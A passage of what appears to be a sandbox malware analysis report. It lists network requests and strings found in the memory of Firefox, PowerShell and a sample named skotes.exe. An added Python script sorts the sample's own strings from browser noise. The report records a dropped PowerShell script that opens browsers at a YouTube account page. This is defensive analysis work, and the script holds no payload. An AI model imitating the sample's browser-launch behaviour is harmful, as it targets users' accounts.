Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6159000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: 14287614-3088-4146-9848-cff2ed487ea7.tmp.17.dr String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: BETWEEN :prefix || 'www.' || :strippedURL AND :prefix || 'www.' || :strippedURL || X'FFFF'It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function[{incognito:null, tabId:null, types:["sub_frame"], urls:["*://trends.google.com/trends/embed*"], windowId:null}, ["blocking", "responseHeaders"]]You may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: 000003.log.17.dr String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
Source: 000003.log.17.dr String found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
Source: 000003.log.17.dr String found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3108663751.000001A8B8B3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3090481370.0000000008657000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com/account ? equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3065741269.00000000075AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000000F.00000002.3032272020.000002B535160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation(% equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.2989914534.0000000002E45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account C:\Program Files\Mozilla Firefox\firefox.exe equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: $]q https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp, KQGBYWk[1].ps1.6.dr, KQGBYWk.ps1.6.dr String found in binary or memory: $url = "https://www.youtube.com/account" equals www.youtube.com (Youtube)
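The entries above mix two very different things under one label. Some strings were put in memory by the sample itself and its PowerShell stage: the $url = "https://www.youtube.com/account" assignment in KQGBYWk.ps1 (downloaded by skotes.exe, process 6) and the firefox.exe / msedge.exe command lines started from it. Most of the rest is Firefox's own built-in content (default top sites, new-tab HTML, crash-reporter environment variables) that would match "equals www.youtube.com" on any clean machine. The Python script below is an added triage example, not part of the Joe Sandbox report: it parses entries of this form, attributes each memdump and dropped file to its owning process, and separates hits owned by a non-browser process from browser-internal noise, then pulls out the URLs the command lines and the script point at. Assumptions not stated on the page: that the hex first field of a memdump id and the decimal N of a .N.dr suffix are the same process index (the skotes.exe / 00000006 / KQGBYWk.ps1.6.dr combination above is consistent with that), that firefox.exe, msedge.exe and chrome.exe memory is benign by default, and the category names are mine. The sample entries in the script are copied from this section.

```python
"""Triage helper for the 'String found in binary or memory' entries of a Joe
Sandbox report (added example, not part of the report): attributes every hit
to the process owning the memdump or dropped file it came from, so the
sample's own strings can be separated from the browser's built-in content."""
import re
from collections import namedtuple

ENTRY_RE = re.compile(
    r"^Source:\s*(?P<sources>.+?)\s+String found in binary or memory:\s*"
    r"(?P<string>.*)\s+equals\s+(?P<domain>\S+)\s+\((?P<label>[^)]*)\)\s*$"
)
DR_RE = re.compile(r"^(?P<name>.+)\.(?P<pid>\d+)\.dr$")                    # dropped file, owner index (decimal)
CMDLINE_RE = re.compile(r'"(?P<exe>[^"]+\.exe)"\s+(?P<url>https?://\S+)')  # "<exe>" <url>
PS_URL_RE = re.compile(r'\$\w+\s*=\s*"(?P<url>https?://[^"]+)"')           # $var = "<url>"

BROWSERS = {"firefox.exe", "msedge.exe", "chrome.exe"}  # assumption: their own memory is benign noise
DROPPED = "<dropped file>"
Origin = namedtuple("Origin", "process pid artifact")   # process name (or DROPPED), index, memdump/file
Hit = namedtuple("Hit", "origins string domain label")

def parse_sources(text):
    """'proc, <memdump>.sdmp, ..., <file>.N.dr' -> tuple of Origin. Assumption: the
    hex first field of a memdump id and the decimal N of a .N.dr suffix are the
    same process index (skotes.exe / 00000006 / KQGBYWk.ps1.6.dr agree on that)."""
    origins, pending = [], None
    for tok in (t.strip() for t in text.split(",")):
        dr = DR_RE.match(tok)
        if tok.endswith(".sdmp"):
            origins.append(Origin(pending or "?", int(tok.split(".")[0], 16), tok))
            pending = None
        elif dr:
            origins.append(Origin(DROPPED, int(dr.group("pid")), tok))
            pending = None
        else:
            pending = tok  # a process name; its memdump id follows
    return tuple(origins)

def parse_report(text):
    hits = []
    for line in text.strip().splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            hits.append(Hit(parse_sources(m.group("sources")), m.group("string"),
                            m.group("domain"), m.group("label")))
    return hits

def build_pid_map(hits):
    """process index -> process name, learned from every memdump origin."""
    return {o.pid: o.process for h in hits for o in h.origins if o.process != DROPPED}

def owners(hit, pid_map):
    """Owning process per origin; dropped files resolve through their .N.dr index."""
    return [pid_map.get(o.pid, "unknown") if o.process == DROPPED else o.process
            for o in hit.origins]

def classify(hit, pid_map):
    procs = {p.lower() for p in owners(hit, pid_map)}
    if procs - BROWSERS - {"unknown"}:
        return "non-browser"      # the sample, its PowerShell stage, or a file they dropped
    if "unknown" in procs:
        return "unattributed"     # dropped by a process that has no memdump in the report
    if CMDLINE_RE.search(hit.string):
        return "browser-launch"   # browser memory, but the string is its own launch command line
    return "browser-internal"     # default top sites, prefs, new-tab HTML: noise

def triage(text):
    """category -> hits, in report order."""
    hits, out = parse_report(text), {}
    pid_map = build_pid_map(hits)
    for h in hits:
        out.setdefault(classify(h, pid_map), []).append(h)
    return out

def launched_urls(hits):
    """(exe basename, url) for every '"<exe>" <url>' command line seen."""
    return {(m.group("exe").replace("\\", "/").rsplit("/", 1)[-1], m.group("url"))
            for h in hits for m in CMDLINE_RE.finditer(h.string)}

def script_urls(hits):
    """URLs assigned to a variable inside a PowerShell script ($url = "...")."""
    return {m.group("url") for h in hits for m in PS_URL_RE.finditer(h.string)}

# Constructed sample: five entries copied verbatim from this report.
SAMPLE = r"""
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: powershell.exe, 00000007.00000002.3065741269.00000000075AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2991420610.0000027D5D6C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3299533997.000001A8A5D60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: skotes.exe, 00000006.00000002.3278202583.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3030468982.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp, KQGBYWk[1].ps1.6.dr, KQGBYWk.ps1.6.dr String found in binary or memory: $url = "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: 000003.log.17.dr String found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
"""

if __name__ == "__main__":
    for cat, hs in triage(SAMPLE).items():
        print(f"{cat}: {len(hs)}", [h.string[:50] for h in hs])
    print("launched:", launched_urls(parse_report(SAMPLE)), "script:", script_urls(parse_report(SAMPLE)))
```

Run as a script it prints the category counts for the five sample entries; for a real report, pass the whole "String found in binary or memory" block to triage(). The pid map is learned from the memdump ids in the same block, so a dropped file whose owner never appears as a memdump (000003.log.17.dr here) is reported as unattributed rather than silently treated as benign.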
Source: firefox.exe, 00000010.00000003.3228844860.000001A8B6057000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3315084846.000001A8B3E71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: *://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000010.00000002.3299129330.000001A8A5CE0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: -os-restarted https://www.youtube.com/accountH equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3246944068.000001A8B91AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BC2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3340745234.000001A8B7C91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8*://www.facebook.com/* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000002.3323580066.000001A8B6503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3264434250.000001A8C317B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B49B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3343255794.000001A8B7E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B6190000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3263352248.000001A8C37F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3345132926.000001A8B7EE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3108722427.000001A8B868C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3270733582.000001A8B868C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000002.3323580066.000001A8B6503000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3240111814.000001A8BFFCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3029532362.000001A8A844F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3304423656.000001A8A844F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3309155779.000001A8B2900000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3122177082.000001A8B89B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: >e=nssBadCert&u=https%3A//www.youtube.com/account&c=UTF-8&d=%20 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000010.00000003.3242315863.000001A8B9F33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000016.00000002.3284374660.0000029D56104000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3291692182.000002B9C2CA4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3290620208.000001F42CED4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common 